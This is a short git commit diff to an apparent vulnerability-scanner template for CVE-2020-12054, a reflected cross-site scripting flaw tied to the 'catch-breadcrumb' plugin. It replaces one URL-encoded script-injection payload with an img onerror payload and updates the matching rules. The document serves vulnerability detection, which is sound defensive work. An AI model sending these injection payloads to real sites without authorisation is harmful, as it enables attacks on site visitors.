Update CVE-2020-12054.yaml

patch-1
sandeep 2021-07-19 23:55:15 +05:30
parent 574245af0d
commit 414883f719
1 changed files with 3 additions and 3 deletions

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- "<img src=x onerror=alert(123);>"
- "catch-breadcrumb"
part: body
condition: and
@ -29,4 +29,4 @@ requests:
- type: status
status:
- 200
- 200